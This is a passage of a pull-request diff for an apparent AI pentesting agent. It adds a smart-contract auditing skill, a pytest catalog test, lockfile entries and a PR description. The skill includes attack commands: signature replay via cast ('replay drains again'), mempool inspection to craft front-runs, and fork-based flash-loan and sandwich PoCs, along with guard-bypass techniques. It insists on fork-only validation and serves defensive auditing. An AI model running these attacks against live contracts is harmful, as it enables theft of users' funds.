+Contracts that read spot price from a single DEX pool (`getReserves`, `balanceOf`/`totalSupply` of an LP) can be skewed within one transaction by a flash loan that imbalances the pool, then exploited (over-borrow, mint, liquidate), then unwound. Spot AMM price is not an oracle. Defenses: Chainlink/TWAP feeds, `latestRoundData` staleness/round checks.
+
+**Test:**
+```
+slither . --detect tautology   # plus manual review of any getReserves()/balanceOf-based pricing
+grep -rnE "getReserves|getAmountsOut|balanceOf\(address\(this\)\)" src/ contracts/
+# Foundry mainnet fork: borrow flash loan, swap to skew, call victim, repay
+forge test --fork-url $MAINNET_RPC --match-test testOracleManipulation -vvv
+grep -rn "latestRoundData\|updatedAt\|answeredInRound" src/ contracts/
+```
+
+### Signature Replay / Missing Nonce / Malleability
+
+`ecrecover` signatures reused across functions, chains, or contracts when the signed payload omits a nonce, `address(this)`, or `chainId`/EIP-712 domain separator. ECDSA is malleable — `(r, s)` and `(r, -s mod n)` both verify, so signature-as-key dedup fails unless `s` is constrained to the lower half. `ecrecover` returns `address(0)` for invalid sigs, which must be rejected.
+
+**Test:**
+```
+slither . --detect missing-zero-check
+grep -rn "ecrecover" src/ contracts/         # verify nonce + chainId + low-s + zero-address check
+# Sign a claim digest, then submit the same signature twice; second must revert if nonce-protected
+SIG=$(cast wallet sign --private-key $PK $(cast keccak "claim:100"))
+cast send $C "claim(uint256,bytes)" 100 $SIG --rpc-url $RPC --private-key $PK
+cast send $C "claim(uint256,bytes)" 100 $SIG --rpc-url $RPC --private-key $PK   # replay drains again
+```
+
+### Front-Running & MEV / Sandwich
+
+Pending txs are public; a profitable swap or claim can be front-run, back-run, or sandwiched by reordering with higher gas/priority fees. Missing `minAmountOut`/`deadline` slippage params, commit-reveal-free auctions, and on-chain randomness-as-secret are all exploitable. Approvals and `claim()` of known reward amounts are classic targets.
+
+**Test:**
+```
+# Inspect mempool for victim tx and craft front/back-run
+cast rpc txpool_content --rpc-url $RPC | jq '.pending'
+grep -rnE "amountOutMin|minOut|deadline|block.timestamp" src/ contracts/
+# Simulate sandwich on a fork: front-run swap, victim swap, back-run swap
+forge test --fork-url $MAINNET_RPC --match-test testSandwich -vvv
+```
+
+### Denial of Service (gas, unbounded loops)
+
+Loops over caller-growable arrays (push to a `recipients[]` then iterate to pay) can be made to exceed the block gas limit, permanently bricking the function. Pull-over-push payment, a single transfer to a contract that reverts in `receive()` blocking a batch, and external calls inside loops are the patterns. `selfdestruct`-forced balance changes break strict `address(this).balance ==` invariants.
+
+**Test:**
+```
+slither . --detect calls-loop,costly-loop,msg-value-loop
+grep -rnE "for *\(.*length|while *\(" src/ contracts/   # unbounded iteration
+# Echidna invariant: contract never reaches a permanently-stuck state
+echidna . --contract VaultEchidna --config echidna.yaml
+# Foundry gas check: grow the array and assert the loop still fits the block
+forge test --match-test testGasGriefing --gas-report -vvv
+```
+
+### Bad Randomness
+
+`block.timestamp`, `blockhash`, `block.prevrandao`/`block.difficulty`, and `block.number` are validator-influenceable or known in-transaction, so any lottery/NFT-mint/game that derives a "secret" from them is predictable or grindable by a contract that reverts on unfavorable outcomes. Use Chainlink VRF or commit-reveal.
+
+**Test:**
+```
+grep -rnE "block.timestamp|blockhash|block.difficulty|block.prevrandao|block.number" src/ contracts/
+slither . --detect weak-prng
+# Foundry: an attacker contract that computes the same "random" value in the same block and only enters on a win
+forge test --match-test testPredictRandom -vvv
+```
+
+## Bypass Techniques
+
+**Reentrancy guard gaps**
+- `nonReentrant` on `withdraw` but not on a sibling function reading the same balance enables cross-function reentrancy
+- Read-only reentrancy bypasses *all* guards on the victim — the flaw is in the external consumer trusting a mid-tx `view`
+
+**Access-control phishing**
+- `tx.origin == owner` checks are defeated by tricking the owner into calling an attacker contract that then calls the target
+
+**Token-behavior assumptions**
+- Fee-on-transfer and rebasing tokens break `amountReceived == amountSent`; deflationary tokens under-credit deposits
+- ERC-777 hooks re-enter ERC-20-shaped logic that never expected a callback
+
+**Proxy confusion**
+- Function selector clash between proxy admin functions and implementation functions (Transparent proxy mitigates; naive proxies do not)
+
+## Testing Methodology
+
+1. **Acquire the code** - pull verified source via Etherscan API; if unverified, decompile bytecode and reconstruct storage layout
+2. **Map the surface** - `slither . --print human-summary,function-summary,inheritance` for entry points, modifiers, and externals
+3. **Static pass** - run full Slither detector set; triage criticals (reentrancy, suicidal, arbitrary-send, controlled-delegatecall)
+4. **Symbolic pass** - `myth analyze` on hot contracts for overflow, assertion violations, unprotected functions
+5. **Model invariants** - encode "total supply == sum of balances", "no free mint", "owner unchanged" and fuzz with Echidna/Foundry
+6. **Fork & PoC** - on a mainnet fork, write a Foundry test that funds an attacker (flash loan if needed) and proves value extraction
+7. **Check oracles & deps** - trace every external price/state read; confirm TWAP/Chainlink staleness guards
+8. **Inspect live state** - read proxy slots, owner, paused flags, and implementation initialization status on-chain via `cast`
+9. **Mempool & MEV** - assess slippage/deadline params and reorder-ability of profitable actions
+
+## Validation
+
+1. Prove exploitation on a forked node (`--fork-url`) where attacker balance increases — never broadcast to mainnet
+2. Show the exact storage slot or balance delta before/after with `cast storage` / `cast balance` snapshots
+3. For access control, demonstrate a non-owner address successfully calling a guarded function in a fork or local deploy
+4. For oracle manipulation, show the manipulated price the victim read versus the true market price in the same block
+5. Capture the full PoC transaction trace (`forge test -vvvv`) so the call sequence and revert points are unambiguous
+6. Keep PoCs read-or-fork only against production; do not send state-changing txs to live contracts
+
+## False Positives
+
+- `reentrancy-benign` / `reentrancy-events` from Slither where the only post-call effect is an event emission (no fund risk)
+- `unchecked` blocks that are provably bounded (loop index already range-checked, hash of fixed-size input)
+- `tx.origin` used only for analytics/logging, not authorization
+- `arbitrary-send` flagged on a function that is in fact `onlyOwner` through a custom modifier Slither did not resolve
+- Spot-price reads that are sanity-bounded against a TWAP or have a max-deviation circuit breaker
+- "Uninitialized" implementation that calls `_disableInitializers()` in its constructor
+
+## Impact
+
+- Irreversible theft of all contract-held funds (reentrancy, access control, oracle manipulation)
+- Permanent loss of upgradeability or self-destruction of the implementation (uninitialized UUPS)
+- Unauthorized minting / supply inflation collapsing token value (overflow, missing access control)
+- Protocol insolvency from manipulated collateral pricing and bad-debt liquidations
+- Permanently bricked functions (gas-DoS) freezing user funds with no recovery
+- MEV extraction: users systematically pay a hidden tax to sandwichers
+
+## Pro Tips
+
+1. Always test on a mainnet fork (`forge test --fork-url`) before claiming an oracle/flash-loan finding — local toy pools hide real liquidity constraints
+2. Slither first, Mythril second; Slither's `--print function-summary` is the fastest map of who-can-call-what
+3. Read the EIP-1967 slots directly (`cast storage`) rather than trusting `implementation()` getters that may lie or be absent
+4. Cross-function reentrancy is missed by single-function guards and by reviewers staring at one function — diff the state each function reads vs writes
+5. Read-only reentrancy lives in the *integrator*, not the pool; audit how downstream contracts consume `getReserves`/`get_virtual_price` mid-tx
+6. Constrain `ecrecover` to lower-half `s` and reject `address(0)` — malleability and zero-address recovery are routinely forgotten
+7. For DoS, the killer pattern is an external call (token transfer, ETH send) inside a loop the attacker can grow or stall
+8. `block.prevrandao` is not a secret — it is known during execution and weakly biasable by the proposer; treat any RNG without VRF/commit-reveal as broken
+9. Fee-on-transfer tokens silently break deposit accounting; always diff `balanceBefore`/`balanceAfter` rather than trusting the transfer amount
+
+## Summary
+
+Smart-contract findings chain from a single broken assumption into total loss because execution is atomic and irreversible: a missing modifier or unprotected `initialize` yields ownership, ownership yields `upgradeToAndCall` or `selfdestruct`, and a manipulable price source plus a flash loan yields a fully-funded single-block drain that unwinds before anyone can react. Start by mapping every value-moving external and the guard that should precede it, prove the gap on a fork with a Foundry PoC that increases attacker balance, and validate non-destructively by reading state deltas rather than broadcasting to production.

--- a/tests/skills/test_skills_catalog.py
+++ b/tests/skills/test_skills_catalog.py
@@ -1,0 +1,86 @@
+"""Catalog invariants for bundled skills — frontmatter, unique stems, discovery."""
+
+from __future__ import annotations
+
+import re
+from typing import TYPE_CHECKING
+
+import pytest
+
+from strix.skills import (
+    get_all_skill_names,
+    get_available_skills,
+    load_skills,
+    validate_requested_skills,
+)
+from strix.utils.resource_paths import get_strix_resource_path
+
+
+if TYPE_CHECKING:
+    from pathlib import Path
+
+
+_FRONTMATTER = re.compile(r"^---\s*\n(.*?)\n---\s*\n", re.DOTALL)
+_NAME = re.compile(r"^name:\s*(.+)$", re.MULTILINE)
+_DESCRIPTION = re.compile(r"^description:\s*(.+)$", re.MULTILINE)
+
+_NEW_CATEGORIES = ("api", "web3", "mobile", "binary")
+_NEW_SKILLS = (
+    "aws",
+    "azure",
+    "gcp",
+    "rest_api",
+    "smart_contracts",
+    "blockchain_rpc",
+    "android_apk",
+    "ios_ipa",
+    "native_executable",
+)
+
+
+def _skill_files() -> list[Path]:
+    return sorted(get_strix_resource_path("skills").glob("*/*.md"))
+
+
+@pytest.mark.parametrize("path", _skill_files(), ids=lambda p: f"{p.parent.name}/{p.stem}")
+def test_skill_frontmatter_is_valid(path: Path) -> None:
+    block = _FRONTMATTER.match(path.read_text(encoding="utf-8"))
+    assert block is not None, f"{path}: missing YAML frontmatter"
+    name_match = _NAME.search(block.group(1))
+    description_match = _DESCRIPTION.search(block.group(1))
+    assert name_match is not None, f"{path}: frontmatter missing 'name'"
+    assert description_match is not None, f"{path}: frontmatter missing 'description'"
+    assert description_match.group(1).strip(), f"{path}: empty description"
+    # Display name is hyphenated by convention; the resolvable id is the file stem.
+    name = name_match.group(1).strip()
+    assert name.replace("-", "_") == path.stem, f"{path}: name '{name}' != stem '{path.stem}'"
+
+
+def test_skill_stems_are_globally_unique() -> None:
+    seen: dict[str, Path] = {}
+    collisions: list[str] = []
+    for path in _skill_files():
+        if path.stem in seen:
+            collisions.append(f"{path} shadows {seen[path.stem]}")
+        seen[path.stem] = path
+    assert not collisions, collisions
+
+
+def test_new_asset_categories_are_discoverable() -> None:
+    catalog = get_available_skills()
+    assert [c for c in _NEW_CATEGORIES if c not in catalog] == []
+    names = get_all_skill_names()
+    assert [s for s in _NEW_SKILLS if s not in names] == []
+
+
+def test_validate_requested_skills_accepts_new_and_rejects_unknown() -> None:
+    assert validate_requested_skills(["aws", "smart_contracts", "rest_api"]) is None
+    assert validate_requested_skills(["nope_not_real"]) is not None
+
+
+def test_load_skills_returns_stripped_bodies() -> None:
+    loaded = load_skills(["aws", "android_apk"])
+    assert set(loaded) == {"aws", "android_apk"}
+    for body in loaded.values():
+        assert body
+        assert not body.startswith("---")

--- a/uv.lock
+++ b/uv.lock
@@ -776,6 +776,15 @@ wheels = [
 ]
 
 [[package]]
+name = "iniconfig"
+version = "2.3.0"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/72/34/14ca021ce8e5dfedc35312d08ba8bf51fdd999c576889fc2c24cb97f4f10/iniconfig-2.3.0.tar.gz", hash = "sha256:c76315c77db068650d49c5b56314774a7804df16fee4402c1f19d6d15d8c4730", size = 20503, upload-time = "2025-10-18T21:55:43.219Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/cb/b1/3846dd7f199d53cb17f49cba7e651e9ce294d8497c8c150530ed11865bb8/iniconfig-2.3.0-py3-none-any.whl", hash = "sha256:f631c04d2c48c52b84d0d0549c99ff3859c98df65b3101406327ecc7d53fbf12", size = 7484, upload-time = "2025-10-18T21:55:41.639Z" },
+]
+
+[[package]]
 name = "jinja2"
 version = "3.1.6"
 source = { registry = "https://pypi.org/simple" }
@@ -1348,6 +1357,15 @@ wheels = [
 ]
 
 [[package]]
+name = "pluggy"
+version = "1.6.0"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/f9/e2/3e91f31a7d2b083fe6ef3fa267035b518369d9511ffab804f839851d2779/pluggy-1.6.0.tar.gz", hash = "sha256:7dcc130b76258d33b90f61b658791dede3486c3e6bfb003ee5c9bfb396dd22f3", size = 69412, upload-time = "2025-05-15T12:30:07.975Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/54/20/4d324d65cc6d9205fabedc306948156824eb9f0ee1633355a8f7ec5c66bf/pluggy-1.6.0-py3-none-any.whl", hash = "sha256:e920276dd6813095e9377c0bc5566d94c932c33b27a3e3945d8389c374dd4746", size = 20538, upload-time = "2025-05-15T12:30:06.134Z" },
+]
+
+[[package]]
 name = "pre-commit"
 version = "4.5.1"
 source = { registry = "https://pypi.org/simple" }
@@ -1631,6 +1649,22 @@ dependencies = [
 sdist = { url = "https://files.pythonhosted.org/packages/74/b2/5db700e52554b8f025faa9c3c624c59f1f6c8841ba81ab97641b54322f16/pyright-1.1.408.tar.gz", hash = "sha256:f28f2321f96852fa50b5829ea492f6adb0e6954568d1caa3f3af3a5f555eb684", size = 4400578, upload-time = "2026-01-08T08:07:38.795Z" }
 wheels = [
     { url = "https://files.pythonhosted.org/packages/0c/82/a2c93e32800940d9573fb28c346772a14778b84ba7524e691b324620ab89/pyright-1.1.408-py3-none-any.whl", hash = "sha256:090b32865f4fdb1e0e6cd82bf5618480d48eecd2eb2e70f960982a3d9a4c17c1", size = 6399144, upload-time = "2026-01-08T08:07:37.082Z" },
+]
+
+[[package]]
+name = "pytest"
+version = "9.0.3"
+source = { registry = "https://pypi.org/simple" }
+dependencies = [
+    { name = "colorama", marker = "sys_platform == 'win32'" },
+    { name = "iniconfig" },
+    { name = "packaging" },
+    { name = "pluggy" },
+    { name = "pygments" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/7d/0d/549bd94f1a0a402dc8cf64563a117c0f3765662e2e668477624baeec44d5/pytest-9.0.3.tar.gz", hash = "sha256:b86ada508af81d19edeb213c681b1d48246c1a91d304c6c81a427674c17eb91c", size = 1572165, upload-time = "2026-04-07T17:16:18.027Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/d4/24/a372aaf5c9b7208e7112038812994107bc65a84cd00e0354a88c2c77a617/pytest-9.0.3-py3-none-any.whl", hash = "sha256:2c5efc453d45394fdd706ade797c0a81091eccd1d6e4bccfcd476e2b8e0ab5d9", size = 375249, upload-time = "2026-04-07T17:16:16.13Z" },
 ]
 
 [[package]]
@@ -2056,6 +2090,7 @@ dev = [
     { name = "pre-commit" },
     { name = "pyinstaller", marker = "python_full_version < '3.15'" },
     { name = "pyright" },
+    { name = "pytest" },
     { name = "ruff" },
 ]
 
@@ -2079,6 +2114,7 @@ dev = [
     { name = "pre-commit", specifier = ">=4.2.0" },
     { name = "pyinstaller", marker = "python_full_version >= '3.12' and python_full_version < '3.15'", specifier = ">=6.17.0" },
     { name = "pyright", specifier = ">=1.1.401" },
+    { name = "pytest", specifier = ">=8.0.0" },
     { name = "ruff", specifier = ">=0.11.13" },
 ]
 


### PR DESCRIPTION
## Summary

Expands Strix's asset-class coverage by adding security-testing **skills** for the major asset types it previously lacked. Skills are knowledge packages injected into each agent's system prompt (`<available_skills>`) and pulled on demand via `load_skill` / `create_agent(skills=...)`, so a missing category is a real capability gap — and the README already advertised some of these (AWS/Azure/GCP) without shipping them.

## What's added

Nine skills — three under `cloud`, six across four new categories:

| Category | Skills |
|----------|--------|
| `cloud` | `aws`, `azure`, `gcp` |
| `web3` *(new)* | `smart_contracts`, `blockchain_rpc` |
| `mobile` *(new)* | `android_apk`, `ios_ipa` |
| `binary` *(new)* | `native_executable` |
| `api` *(new)* | `rest_api` |

Coverage highlights:
- **AWS/Azure/GCP** — IAM/role privilege-escalation paths, IMDS/metadata SSRF credential theft, storage/bucket exposure, secret stores, cross-account/SA pivoting (awscli, Pacu, ScoutSuite, `az`, ROADtools, `gcloud`, GCPBucketBrute).
- **Web3** — EVM/Solidity bug classes (reentrancy, delegatecall/proxy storage collisions, oracle/flash-loan manipulation, signature replay) with slither/mythril/foundry/echidna PoCs; exposed/unauthenticated JSON-RPC and dApp signing abuse.
- **Mobile** — Android APK and iOS IPA static + dynamic analysis (apktool/jadx/MobSF, class-dump/otool, frida/objection pinning + jailbreak/root-detection bypass).
- **Binary** — ELF/PE/Mach-O triage, protection enumeration (checksec), memory-safety classes, and RE/fuzzing tooling (Ghidra, radare2, gdb+pwndbg, AFL++, pwntools).
- **REST API** — structured around the OWASP API Security Top 10 (2023), cross-referencing existing `idor` / `mass_assignment` / `authentication_jwt` / `bfla` / `ssrf` skills.

Each skill follows the established format (hyphenated frontmatter `name` matching the file stem; Attack Surface → Key Vulnerabilities with runnable `Test:` blocks → Bypass Techniques → Testing Methodology → Validation → False Positives → Impact → Pro Tips → Summary) and names only real tooling. New category dirs surface automatically via `get_available_skills()` — no loader changes needed.

## Wiring, docs, tests

- README category table documents the four new categories.
- New pytest suite `tests/skills/test_skills_catalog.py` enforces catalog invariants for **every** bundled skill (existing + new): valid frontmatter, `name` normalizing to the file stem, **globally unique stems** (`load_skills` resolves by stem, so a reused stem would silently shadow another skill), category discoverability, and frontmatter stripping. This also guards future skill contributions.
- Bootstraps `pytest` (dev dependency + `[tool.pytest.ini_options]`) and a `make test` target wired into `make check-all`, since the repo had no test harness yet.

## Verification

- `pytest`: 58 passed (parametrized across the whole skill catalog + invariant tests)
- `ruff check` + `ruff format --check` (v0.11.13): clean
- `mypy --strict`: clean on the new test
- All skill/markdown files: no trailing whitespace, single trailing newline

## Scope note

This is not a literal "100% of all assets" claim — that isn't a meaningful guarantee. It broadens coverage across the major asset classes Strix lacked, using the idiomatic, extensible skills mechanism; further classes (gRPC, Solana/non-EVM, desktop/IoT firmware, etc.) drop in as additional skill files with no code changes.
